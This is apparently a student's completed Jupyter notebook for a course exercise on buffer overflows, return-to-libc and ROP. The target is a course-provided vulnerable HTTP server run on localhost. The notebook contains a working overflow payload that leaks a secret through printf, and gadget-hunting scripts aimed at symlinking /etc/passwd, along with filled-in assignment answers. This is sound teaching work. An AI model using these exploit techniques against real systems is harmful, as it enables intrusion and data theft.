# Exercise 2: Buffer Overflow and Return-Oriented Programming (ROP) Attacks

### Assignment Deadline: Feb 14th (Friday) before 11:59PM


**This assignment is worth 15% of the semester grade.**

**The latter part of the assignment may be challenging. If you cannot finish the whole exercise, you can still obtain partial points on the part finished.**

Before you start, run the following cell to install some dependencies. In this project, we mainly need three Python modules:

*   `python-ptrace`: Tracing processes and retrieve process states
*   `lief`: ELF binary reader and transformer
*   `capstone`: amazing x86 disassembler



In [None]:
!pip install python-ptrace lief capstone

Collecting python-ptrace
  Downloading python_ptrace-0.9.9-py2.py3-none-any.whl.metadata (1.5 kB)
Collecting lief
  Downloading lief-0.16.4-cp311-cp311-manylinux_2_28_x86_64.whl.metadata (2.5 kB)
Collecting capstone
  Downloading capstone-5.0.5-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.3 kB)
Downloading python_ptrace-0.9.9-py2.py3-none-any.whl (104 kB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m104.8/104.8 kB[0m [31m2.9 MB/s[0m eta [36m0:00:00[0m
[?25hDownloading lief-0.16.4-cp311-cp311-manylinux_2_28_x86_64.whl (3.0 MB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m3.0/3.0 MB[0m [31m20.4 MB/s[0m eta [36m0:00:00[0m
[?25hDownloading capstone-5.0.5-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.5 MB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m1.5/1.5 MB[0m [31m28.7 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: python-ptrace, lief, capstone
Successfully installed 

## Step 1: Buffer Overflow

Now, we will download and unzip the binary sample of a HTTP server vulnerable to ROP attack. You may also download the sample from the given Google Drive link and analyze yourself on your own computer if you want. Running the server on your computer will not damage your computer.


In [None]:
!wget -O server-sample.zip https://github.com/chiache/csce713-assignments/raw/master/lab2/server-sample.zip
!unzip -o server-sample.zip

--2025-03-06 05:51:22--  https://github.com/chiache/csce713-assignments/raw/master/lab2/server-sample.zip
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab2/server-sample.zip [following]
--2025-03-06 05:51:23--  https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab2/server-sample.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435193 (425K) [application/zip]
Saving to: ‘server-sample.zip’


2025-03-06 05:51:24 (2.42 MB/s) - ‘server-sample.zip’ saved [435193/435193]

Archive:  server-sample.zip
   creating: public/
   creating: public/

Next, let's run the HTTP server as a background process.

In [None]:
!killall -9 -q server

import subprocess
import time

p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

# Wait for server to start
while True:
  if "Server started" in p.stderr.readline(): break

time.sleep(1)

Once the HTTP server is up and running, try the following cell to retrieve the index page of the website. If the server works, you should be able to see the "**Hello World**" message from the index page.

In [None]:
import requests
from IPython.core.display import display, HTML

r = requests.get('http://127.0.0.1:8000', stream=True)
display(HTML(r.text))

Next, modify the following cell to access different URLs inside the server and find the condition that will crash the server. **Hint: You can start with an extremely long URL to test the server.**

You can keep retry even if you accidentially crash the server. The server utilizes multiple processes so even if you crash one process with a URL, the server can continue to run.

In [None]:
import requests
from IPython.core.display import display, HTML

# TODO: Manipulate the following command to crash the server
url = 'http://127.0.0.1:8000/'
url = url + 153 * 'a'
r = requests.get(url, stream=True)
display(HTML(r.text))

According to your experiment, what is the crashing condition of the server? Please write down your answer in the following cell.

Your answer: I did binary search to find out actual number of string to add to crash the server using buffer overflow from logn url. At first I started with 100 'a' character then 1000, then 500, can to know that I need actually 154 character to crash the server.

Once you are done, you can terminate the server using the following cell.

In [None]:
!killall -9 -q server

## Step 2: Return-to-libc attack

In this step, you will perform a return-to-libc attack to print out extra information from the server. A return-to-libc attack is an attack based on stack smashing, which will overwrite the stack return address to jump to a known libc function, such as `system()` or `printf()`. Normally, there are many challenges which will make this attack difficult. For example, the **address space layout randomization (ASLR)** will load the libc libray into random address inside the application process, making it challenging to determine what address to inject into the stack. Further, without direct access to the process state, the attacker needs to make a lot of guesses and assemptions to figure out how to attack.

To make the attack easier, we made several changes to the target program:

1.   The target program (`server`) is statically compiled with the libc code included, and the binary is loaded at a fixed place so it will not be affected by Address Space Layout Randomization (ASLR). The only part that is subject to ASLR is the stack.
2.   The target program (`server`) is compiled as a 32-bit program on a 64-bit platform, so that each address in the program is 32-bit instead of 64-bit. This largely reduce the difficulty of injecting specific addresses into the stack. Further, the program is compiled with the `-fomit-frame-pointer` option, meaning that the frame pointer (`ebp`) is not injected into the frame by default.
3.   The target program (`server`) will be run under a ptrace program, which will monitor the timing that the program receives a segmentation fault, and will print out the register values and the stacks in the faulting process. This will allow you to peek into the program when it's under the attack.




The goal of this step is to perform a return-to-libc attack to print out a specific **secret** inside the program.

### Step 2.1. Where's the return address?

Let's first take a closer look at the stack to see how the buffer overflow attack overwrites the return address. We will use the following ptrace debugger to run the server sample, so that we can capture the segmentation fault and print the registers and stack when the fault happens. Run the following cell and change the second cell to trigger the crashing condition you found in the previous step.

In [None]:
import ptrace.debugger
from ptrace.debugger import NewProcessEvent, ProcessSignal
from resource import getpagesize
from logging import info
import signal

PGSIZE = getpagesize()

def trace_segfault(pid):
  debugger = ptrace.debugger.PtraceDebugger()
  debugger.traceFork()
  process = debugger.addProcess(pid, False)
  print("Continue process execution")
  process.cont()
  print("Wait next process event...")
  while True:
      event = debugger.waitProcessEvent()
      p = event.process
      if isinstance(event, NewProcessEvent):
        print("New process created: pid = %d" % p.pid)
        p.cont()
      elif isinstance(event, ProcessSignal):
        print("%s in process %d" % (signal.strsignal(event.signum), p.pid))
        print("EIP: %08x" % p.getreg("rip"))
        print("ESP: %08x" % p.getreg("rsp"))
        print("EBP: %08x" % p.getreg("rbp"))
        print("EAX: %08x" % p.getreg("rax"))
        print("EBX: %08x" % p.getreg("rbx"))
        print("ECX: %08x" % p.getreg("rcx"))
        print("EDX: %08x" % p.getreg("rdx"))
        print("Stack (high to low):")
        sp = p.getStackPointer()
        for va in range(sp + 24, sp - 40, -8):
            try:
                value = p.readWord(va)
                if va == sp: mark = " <- ESP"
                else: mark = ""
                print("%08x: %08x"   % (va + 4, value >> 32))
                print("%08x: %08x%s" % (va,     value & 0xFFFFFFFF, mark))
            except:
                pass
        break
  debugger.quit()

In [None]:
!killall -9 -q server

import subprocess
import multiprocessing
import time
import socket
from IPython.core.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# TODO: Manipulate the following command to crash the server
try:
  url = 'http://127.0.0.1:8000/'
  url += 154 * 'a'
  #url += "\x40\x2a\x05\x08"
  #url += "\x3a\xac\x04\x08"
  #url += "\x45\xf0\x0c\x08"
  #url += "\xe0\x94\x10\x08"
  r = requests.get(url, stream=True)
  display(HTML(r.text))
except:
  pass

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 2592
Segmentation fault in process 2592
EIP: 0804ab9a
ESP: ffeabb10
EBP: ffeabba8
EAX: 00000000
EBX: 61616161
ECX: 0970dd4f
EDX: 00000000
Stack (high to low):
ffeabb2c: 08107168
ffeabb28: 0970e693
ffeabb24: 00000131
ffeabb20: 0970e687
ffeabb1c: 00000000
ffeabb18: 00000000
ffeabb14: 00000004
ffeabb10: 00000001 <- ESP
ffeabb0c: 0804ac00
ffeabb08: 61616161
ffeabb04: 61616161
ffeabb00: 61616161
ffeabafc: 61616161
ffeabaf8: 61616161
ffeabaf4: 61616161
ffeabaf0: 61616161




If you set the crashing condition correctly, you shall be able to overwrite just one byte of the return address, so that you can still see the rest of the return address. Next, we can search for the code inside the binary, to find out where the exact return address shall be. The key in this step is that the return address should be the **next** instruction of a `CALL` instruction.

We will use `lief` to read the ELF binary, and use `capstone` to disassmble the code to find the exact return address. You can find their documentations as follows:

* `lief`: https://lief-project.github.io/doc/latest/
* `capstone`: https://www.capstone-engine.org/lang_python.html

In [None]:
import lief
from capstone import *
import os

# Parse the ELF binary
binary = lief.parse("server")

code_section = binary.get_section('.text')
code_start = code_section.virtual_address
code_end = code_start + code_section.size
print("Code section: %08x - %08x" % (code_start, code_end))

# Read the code
fd = os.open('server', os.O_RDONLY)
code = os.pread(fd, code_section.size, code_section.file_offset)

# Parse the instruction within a specific range
search_range = (0x0804ac00, 0x0804acff) # Using this range because when we first encounter server crash beacuse of stack overflow, we can notice that only last byte is 00 (set by our buffer overflow) of 0804ac00, so we can narrow our search region from 0804ac00 to 0804acff

md = Cs(CS_ARCH_X86, CS_MODE_32)
for insn in md.disasm(code[search_range[0]-code_start:search_range[1]-code_start], search_range[0]):
  print("0x%x:\t%s\t%s" %(insn.address, insn.mnemonic, insn.op_str))

Code section: 08049150 - 080cd6e1
0x804ac00:	loopne	0x804ab9a
0x804ac02:	adc	byte ptr [eax], cl
0x804ac04:	mov	eax, dword ptr [eax]
0x804ac06:	mov	edx, dword ptr [esp + 0x30]
0x804ac0a:	shl	edx, 2
0x804ac0d:	add	eax, edx
0x804ac0f:	mov	eax, dword ptr [eax]
0x804ac11:	mov	dword ptr [esp + 4], eax
0x804ac15:	sub	esp, 8
0x804ac18:	push	1
0x804ac1a:	push	dword ptr [esp + 0x10]
0x804ac1e:	call	0x807cfd0
0x804ac23:	add	esp, 0x10
0x804ac26:	sub	esp, 0xc
0x804ac29:	push	dword ptr [esp + 0x10]
0x804ac2d:	call	0x807cf10
0x804ac32:	add	esp, 0x10
0x804ac35:	call	0x8049fff
0x804ac3a:	mov	eax, 0x8107590
0x804ac40:	mov	eax, dword ptr [eax]
0x804ac42:	sub	esp, 0xc
0x804ac45:	push	eax
0x804ac46:	call	0x8059c10
0x804ac4b:	add	esp, 0x10
0x804ac4e:	sub	esp, 8
0x804ac51:	push	1
0x804ac53:	push	1
0x804ac55:	call	0x807f540
0x804ac5a:	add	esp, 0x10
0x804ac5d:	sub	esp, 0xc
0x804ac60:	push	1
0x804ac62:	call	0x807cf10
0x804ac67:	add	esp, 0x10
0x804ac6a:	mov	eax, dword ptr [ebx + 0x1520]
0x804ac70:	sub	esp, 0xc
0

Based on what you found, what are the possible return addresses of the attacked function? Write your answer down in the next cell. There can be multiple possible answers.

Your answer: 804ac23, 804ac32, 804ac3a, 804ac4b, 804ac5a, 804ac67, 804ac79, 804ac98 are the possible return adress after function calls.

### Step 2.2. Find the target symbols

Next, we need to determine the target address we want to inject inside the program. Recall that, to call `printf()` correctly, you need a stack frame that looks as the following:

```
ESP + 24 +------------------+
         |  arguments[N-1]  |
ESP + 20 +------------------+
         |      . . .       |
ESP + 16 +------------------+
         |   arguments[1]   |
ESP + 12 +------------------+
         |   arguments[0]   |
ESP +  8 +------------------+
         |   format string  |
ESP +  4 +------------------+
         |    return addr   |
ESP +  0 +------------------+
```
The `ESP` here will be the stack pointer immediately after the function ends with the `RET` instruction and jumps to the function address you injected into the stack. You will need a format string to contain the proper parameters, such as `%s`, to print out the values that are pointed to by the arguments immediately above the format string. This means that you need at least four pieces of information:


1. The original return address to exit gracefully.
2. A pointer to a string that contains `%s`. Due to ASLR, you cannot directly use any string on the stack or on the heap, so your only hope is the data section of the binary.
3. A pointer to the variable you want to reveal from the program.
4. The address of `printf`.

We already figured out the first one in the last step, so let's modify the next cell to find out the other three pieces of information:

In [None]:
import lief

binary = lief.parse("server")

# TODO: Find out the address of printf (Hint: Use lief API)
printf_addr = binary.get_symbol("printf").value
print("Address of printf = %08x" % (printf_addr))

# TODO: Find out the address of secret (Hint: Use lief API)
secret_addr = binary.get_symbol("secret").value
print("Address of secret = %08x" % (secret_addr))

data_section = binary.get_section('.rodata')
data_start = data_section.virtual_address
data_end = data_start + data_section.size
print("(RO) Data section: %08x - %08x" % (data_start, data_end))

fd = os.open('server', os.O_RDONLY)
data = os.pread(fd, data_section.size, data_section.file_offset)

# TODO: Search for '%s' in the data and add the ponters into a list
format_strings = []
needle = b"%s"
index = 0
while True:
    index = data.find(needle, index)
    if index == -1:
        break
    # Compute the in-memory address of the found string
    pointer_addr = data_start + index
    format_strings.append(pointer_addr)
    index += 1  # move index forward to search for further occurrences

def find_null_terminated_str(x, start):
  s = ''
  for i in range(len(x)):
    if x[start+i] == 0:
      break
    s += chr(x[start+i])
  return s.encode('unicode_escape')

print("Possible format strings:")
for str_addr in format_strings:
  print("%08x: %s" % (str_addr, find_null_terminated_str(data, str_addr - data_start)))

Address of printf = 08052a40
Address of secret = 081094e0
(RO) Data section: 080cf000 - 080eb7f4
Possible format strings:
080cf037: b'%s%s'
080cf039: b'%s'
080cf045: b'%s 200 OK\\n\\n'
080cf071: b'%s\\n\\n'
080cf096: b'%s: %s\\n'
080cf09a: b'%s\\n'
080cf0a3: b'%s 201 Created\\n\\n'
080cf113: b'%s'
080cf116: b'%s 404 Not found\\n\\n'
080cf134: b'%s 500 Internal Server Error\\n\\n'
080cf173: b'%shttp://127.0.0.1:%s%s\\n'
080cf186: b'%s%s\\n'
080cf188: b'%s\\n'
080cf214: b'%s] %s\\x1b[0m\\n'
080cf218: b'%s\\x1b[0m\\n'
080cf22d: b'%s: %s\\n'
080cf231: b'%s\\n'
080cf444: b"%s%s%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf446: b"%s%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf448: b"%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf44f: b"%s%sAssertion `%s' failed.\\n%n"
080cf451: b"%sAssertion `%s' failed.\\n%n"
080cf45e: b"%s' failed.\\n%n"
080cf4cc: b'%s/%s'
080cf4cf: b'%s'
080d0378: b"%s%s%s:%u: %s%sAssertion `%s' failed.\\n"
080d037a: b"%s%s:%u: %s%sAssertion `%s' failed.\\n"
080d037c: b"%s:%

### Step 2.3: Let's do the attack!

Now, let's run the `server` program and simultaneously send HTTP GET request(s) to test the program. Once you can successfully trigger a segmentation fault, watch the dumped stack to figure out what's being injected into the stack.

One thing you have to be aware is that the `requests` module of Python automatically encodes the HTTP requests as Unicode. As a result, if you try to put specific bytes into the requested URL, they may be transformed into different values and therefore you cannot inject the exact the value you want. The solution to that is to send the raw HTTP requests to the server using a TCP socket.  You still need to encode the other parts of the HTTP requests but can encode extra charaters in the middle to inject the values you want into the server stack. The following cell will use sockets instead of the Python `requests` module to issue the HTTP requests.



In [None]:
!killall -9 -q server

import subprocess
import multiprocessing
import time
import socket
from IPython.core.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# Let's use socket instead of requests
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 8000))

# TODO: Manipulate the following command to crash the server
#attack_url = 154 * 'a' + "\x08\x04\xac\x00\x08\x05\x2a\x40\x08\x10\x94\xe0"

attack_stack = [
  0x40, 0x2a, 0x05, 0x08, # Address of printf = 08052a40
  0x3a, 0xac, 0x04, 0x08, # Orinigal return Address: 804ac3a. However 804ac32 also worked for me.
  0x45, 0xf0, 0x0c, 0x08, # 080cf045: b'%s 200 OK\\n\\n'
  0xe0, 0x94, 0x10, 0x08, # Address of secret = 081094e0
]

req = ("GET /" + 'a'*154).encode() + bytearray(attack_stack) + " HTTP/1.1\r\nConnection: close\r\n\r\n".encode()
#print(req)
client_socket.sendall(req)

# Wait for the response and display it
r = client_socket.recv(4096)
#print(r)
client_socket.close()
display(HTML(r.decode()))

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 3127
Segmentation fault in process 3127

## Step 3: Finding ROP Gadgets

In next step, we will try to locate some ROP gadget for future attacks. Remember that we have discussed in the class that a ROP gadget is a piece of instruction from the original code section (the `.text` segment) of the program binary, which can be reused to construct the logic that the attacker intends to perform. Each ROP gadget must be ended with a `RET` instruction, so that we can chain it with another ROP gadget through injecting the address into the stack.

First, we will scan the binary to look for `RET` instruction. You can either use the capstone dissembler, or directly search for the hexadecimal value that `RET` is encoded to (`0xc3`). Finish the following cell to list all the locations in the code section that can be intepretted as `RET` (even if the original instruction is not `RET`).



In [None]:
import lief
from capstone import *
import os

binary = lief.parse("server")

code_section = binary.get_section('.text')
code_start = binary.imagebase + code_section.offset
code_end = code_start + code_section.size

fd = os.open('server', os.O_RDONLY)
code = os.pread(fd, code_section.size, code_section.file_offset)

md = Cs(CS_ARCH_X86, CS_MODE_32)
insn = next(md.disasm(code, code_start))
print("First instruction:")
print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))
print()

# TODO: find all the RET instructions and put them into a list
ret_insns = []
for i in range(len(code)):
  if code[i] == 0xc3:
    ret_insns.append(next(md.disasm(code[i:i+1], code_start+i)))

# Do not change the code below
print("Print all the RET instructions:")
for insn in ret_insns:
  assert insn.mnemonic == 'ret'
  print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

First instruction:
08049150:	sub	esp, 0xc

Print all the RET instructions:
08049647:	ret	
080498ca:	ret	
08049b63:	ret	
08049b6f:	ret	
08049ca5:	ret	
08049cca:	ret	
08049cd4:	ret	
08049ce3:	ret	
08049d16:	ret	
08049d20:	ret	
08049d63:	ret	
08049d68:	ret	
08049da9:	ret	
08049db0:	ret	
08049e13:	ret	
08049e94:	ret	
08049eb1:	ret	
08049eef:	ret	
08049f0f:	ret	
08049f2c:	ret	
08049f3e:	ret	
08049f3f:	ret	
08049ffe:	ret	
0804a010:	ret	
0804a029:	ret	
0804a129:	ret	
0804a396:	ret	
0804a39a:	ret	
0804a3aa:	ret	
0804a5a7:	ret	
0804a721:	ret	
0804a730:	ret	
0804a77c:	ret	
0804a791:	ret	
0804a7a0:	ret	
0804a914:	ret	
0804a923:	ret	
0804ac81:	ret	
0804ac9b:	ret	
0804ad49:	ret	
0804ad83:	ret	
0804ae41:	ret	
0804ae63:	ret	
0804b231:	ret	
0804b241:	ret	
0804b7c1:	ret	
0804b7cc:	ret	
0804b812:	ret	
0804b82e:	ret	
0804b84d:	ret	
0804b981:	ret	
0804ba04:	ret	
0804bb3b:	ret	
0804bbca:	ret	
0804bbde:	ret	
0804bc73:	ret	
0804bccb:	ret	
0804bcde:	ret	
0804be3b:	ret	
0804be8b:	ret	
0804beab:	ret	
0804becb:	

Once you have located all the `RET` instructions, trace back to the instructions prior to the `RET` instructions and print them out. For simplicity, you can assume the specific number of bytes that you will trace back from the `RET` instruction to find the gadget (configured with `MAX_BYTES_PER_GADGET`). For example, you can search up to 16 bytes prior to a `RET` instruction, by disassembling the 16 bytes using capstone. However, you may want to try all the possibilities from 1 to 16 bytes prior to a `RET` instruction, for two reasons:

1. The 16 bytes prior to the `RET` instruction may not be valid for the disassembler, or the disassembler ended with a faw remaining bytes that cannot be disassembled.
2. Even if the 16 bytes can be properly disassembled with no remaining bytes, you would want more combinations of instructions that you can use for the attack.

Remember: Keep your code flexible regardless of what `MAX_BYTES_PER_GADGET` is. Later, you may need to return to this cell to increase the value of `MAX_BYTES_PER_GADGET` and rerun the scanning to find more gadgets.

In [None]:
MAX_BYTES_PER_GADGET = 8 # Not counting the RET instruction

# TODO: find all the gadgets and put them into a list.
# Each gadget shall be a list of instructions, ended with RET.
# Optionally, you can ignore repeated gadgets (i.e., sequences that have already showed up).
gadgets = []

scn_sequences = []
for insn in ret_insns:
  scn_addresses = []
  for start_addr in range(insn.address - MAX_BYTES_PER_GADGET, insn.address):
    if start_addr in scn_addresses:
      continue
    sequence = code[start_addr-code_start:insn.address-code_start]
    if sequence in scn_sequences:
      continue
    gadget = list(md.disasm(sequence, start_addr))
    if len(gadget) == 0:
      continue
    scn_addresses += [i.address for i in gadget]
    scn_sequences.append(sequence)
    if gadget[-1].address + gadget[-1].size < insn.address:
      continue
    gadgets.append(gadget+[insn])

# Do not change the code below
print("Print all the gadgets:")
n = 1
for gadget in gadgets:
  print("Gadget #%d:" % n)
  n += 1
  assert len(gadget) > 0
  assert gadget[-1].mnemonic == 'ret'
  addr = gadget[0].address
  for insn in gadget:
    assert insn.address == addr
    addr += insn.size
    print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

[1;30;43mStreaming output truncated to the last 5000 lines.[0m
080a94a9:	push	es
080a94aa:	lea	eax, [edi + eax + 0x30]
080a94ae:	pop	edi
080a94af:	ret	
Gadget #2207:
080a94ab:	inc	esp
080a94ac:	pop	es
080a94ad:	xor	byte ptr [edi - 0x3d], bl
080a94b0:	xor	eax, eax
080a94b2:	pop	edi
080a94b3:	ret	
Gadget #2208:
080a94ae:	pop	edi
080a94af:	ret	
080a94b0:	xor	eax, eax
080a94b2:	pop	edi
080a94b3:	ret	
Gadget #2209:
080a9520:	xor	esi, esi
080a9522:	pop	ebx
080a9523:	mov	eax, esi
080a9525:	pop	esi
080a9526:	pop	edi
080a9527:	ret	
Gadget #2210:
080a9593:	je	0x80a9570
080a9595:	pop	ebx
080a9596:	mov	eax, ebp
080a9598:	pop	esi
080a9599:	pop	edi
080a959a:	pop	ebp
080a959b:	ret	
Gadget #2211:
080a95a0:	xor	ebp, ebp
080a95a2:	pop	ebx
080a95a3:	pop	esi
080a95a4:	mov	eax, ebp
080a95a6:	pop	edi
080a95a7:	pop	ebp
080a95a8:	ret	
Gadget #2212:
080a95a1:	in	eax, dx
080a95a2:	pop	ebx
080a95a3:	pop	esi
080a95a4:	mov	eax, ebp
080a95a6:	pop	edi
080a95a7:	pop	ebp
080a95a8:	ret	
Gadget #2213:
080a9ab3:	adc	by

In [None]:
print("Total number of gadgets: %d" % len(gadgets))

Total number of gadgets: 3150


## Step 4: Return-Oriented Programming

In this step, you will use all the gadgets you found to construct a return-oriended programming attack. The goal is to create a symbolic link in the `public/` directory to `/etc/passwd` so that you can later open the link to expose the local accounts. To achieve this, you need the gadgets to perform 4 specific tasks:

1. Construct the string of `/etc/passwd` on the stack
2. Concat an existing string to `/public`
3. Setting the registers of EAX, EBX, and ECX for the `symlink` system call
4. Make the system call

ur first step is to find a **system call** gadget. Typically, system calls are made through either `syscall`, `sysenter`, or `int $80`, depending on the architecture it is running. However, The GNU system C library (glibc) nowadays have a more portable design, using a kernel-injected function called `__kernel_vsyscall`. The address of this function is pre-injected into the thread control block (TCB) of the current process and is retrieved using a specific offset to the GS register. To make such a call, the following assembly code is used:

```
call	dword ptr gs:[0x10]
```

Please change the following cell to find gadgets that can perform system calls. If you cannot find one, you may go back to the previous cell that locates all the gadgets and extend the search range.

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains a call to `__kernel_vsyscall`
  is_syscall_gadget = False
  is_syscall_gadget_2 = False
  for insn in gadget:
    if insn.mnemonic == 'call' and insn.op_str == 'dword ptr gs:[0x10]':
      is_syscall_gadget = True
    if insn.op_str == '__kernel_vsyscall':
      is_syscall_gadget_2 = True

  if is_syscall_gadget or is_syscall_gadget_2:
    print("Syscall Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

Syscall Gadget #1:
080ade79:	call	dword ptr gs:[0x10]
080ade80:	ret	
Syscall Gadget #2:
080aef20:	call	dword ptr gs:[0x10]
080aef27:	pop	ebx
080aef28:	ret	


Next, we need to find a gadget that retrieve a pointer to the string `/etc/passwd`. We can inject the string using buffer overflow, and then retrieve the string using certain offset from esp. To do so, we need a gadget that retrieve the current value of esp (`mov xxx, esp`---`xxx` can be any register). Change the following cell to find gadgets that do this.

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains MOV from ESP register
  is_mov_esp_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'mov' and ', esp' in insn.op_str:
      is_mov_esp_gadget = True


  if is_mov_esp_gadget:
    print("MOV ESP Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

MOV ESP Gadget #1:
0807cff3:	mov	ebx, esp
0807cff5:	add	byte ptr [eax], al
0807cff7:	ret	


Finding Pop EAX gadget

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains MOV from ESP register
  is_pop_eax_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'pop' and 'eax' in insn.op_str:
      is_pop_eax_gadget = True


  if is_pop_eax_gadget:
    print("POP EAX Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

POP EAX Gadget #1:
08059d84:	dec	eax
08059d85:	pop	eax
08059d86:	mov	dword ptr [ecx + 0x88], edx
08059d8c:	ret	
POP EAX Gadget #2:
08060953:	pop	esp
08060954:	add	byte ptr [eax], al
08060956:	add	byte ptr [eax], al
08060958:	pop	eax
08060959:	pop	edx
0806095a:	pop	ebx
0806095b:	ret	
POP EAX Gadget #3:
08060984:	add	byte ptr [eax], al
08060986:	add	byte ptr [eax], al
08060988:	pop	eax
08060989:	pop	edx
0806098a:	pop	ebx
0806098b:	ret	
POP EAX Gadget #4:
08062982:	jl	0x80629a8
08062984:	adc	byte ptr [ecx], al
08062986:	pop	eax
08062987:	add	al, 0x89
08062989:	ret	
POP EAX Gadget #5:
08062a33:	pop	eax
08062a34:	cmp	byte ptr [ebx + 0x5e], bl
08062a37:	ret	
POP EAX Gadget #6:
080a5945:	pop	eax
080a5946:	or	byte ptr [ecx + 0x10892048], cl
080a594c:	pop	ebx
080a594d:	ret	
POP EAX Gadget #7:
080c04a6:	shl	eax, cl
080c04a8:	mov	dword ptr [edi], eax
080c04aa:	pop	eax
080c04ab:	pop	ebx
080c04ac:	pop	esi
080c04ad:	pop	edi
080c04ae:	ret	
POP EAX Gadget #8:
080c04a7:	loopne	0x80c0432
080c04a9:	pop	e

Next, we need a gadget that will set a register (like `RAX`) to a specific value. In order to make the symlink system call, we need to set `RAX` to the system call number of symlink. Check [this page](https://syscalls32.paolostivanin.com/) for the correct system call number to set.

To achieve this, you can have two values popped from the stack, and then XOR the values to get the exact result you want. You may also pop one value from the stack and XOR with a constant value. Change the following cell to find gadgets that contains `XOR` instruction. Note that the two operands of the XOR instruction cannot be the same register.

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains XOR
  is_xor_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'xor':
      operands = insn.op_str.split(', ')
      if operands[0] != operands[1]:
        is_xor_gadget = True

  if is_xor_gadget:
    print("XOR Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

XOR Gadget #1:
0804b810:	xor	al, 0x24
0804b812:	ret	
XOR Gadget #2:
0805bc0d:	xor	al, 0x83
0805bc0f:	les	ebx, ptr [ebx + ebx*2]
0805bc12:	pop	esi
0805bc13:	pop	edi
0805bc14:	pop	ebp
0805bc15:	ret	
XOR Gadget #3:
0805e007:	xor	eax, 0x89000219
0805e00c:	ret	
XOR Gadget #4:
0805f022:	in	al, dx
0805f023:	or	al, 0xff
0805f025:	je	0x805f04b
0805f027:	xor	al, 0xe8
0805f029:	ret	
XOR Gadget #5:
08061630:	xor	byte ptr [ebx + 0x5e5b04c4], al
08061636:	ret	
XOR Gadget #6:
080625c3:	rol	byte ptr [ecx], 0x89
080625c6:	xor	al, 5
080625c9:	add	byte ptr [eax], al
080625cb:	ret	
XOR Gadget #7:
08072868:	je	0x80728b4
0807286a:	xor	byte ptr [esi + 0xf], ah
0807286d:	xlatb	
0807286e:	ret	
XOR Gadget #8:
08072869:	dec	edx
0807286a:	xor	byte ptr [esi + 0xf], ah
0807286d:	xlatb	
0807286e:	ret	
XOR Gadget #9:
08077ef1:	xor	byte ptr [ebp + 0x5e5bf465], cl
08077ef7:	pop	edi
08077ef8:	pop	ebp
08077ef9:	ret	
XOR Gadget #10:
0807d436:	xor	byte ptr [ecx], bh
0807d438:	ret	
XOR Gadget #11:
080803a7:	xor	eax, 0x81fff

You also needs a string to point to a file inside the `public` directory. The file cannot pre-exist inside the directory, because if it exists, the `symlink` system call will fail. You typically have to use `strcpy` or `sprintf` to create the string, or delete the file using another system call. For your convenience, we injected a string that starts with `./public` inside the binary. All you have to do is to find this string and inject the address into the stack:

# **add ebx, ebp gadget**

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains MOV from ESP register
  is_pop_eax_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'add' and 'ebx, ebp' in insn.op_str:
      is_pop_eax_gadget = True


  if is_pop_eax_gadget:
    print("ADD EBX, EBP Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

ADD EBX, EBP Gadget #1:
0805c5f8:	add	ebx, ebp
0805c5fa:	ret	


# pop ecx gadget

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains MOV from ESP register
  is_pop_eax_gadget = False

  for insn in gadget:
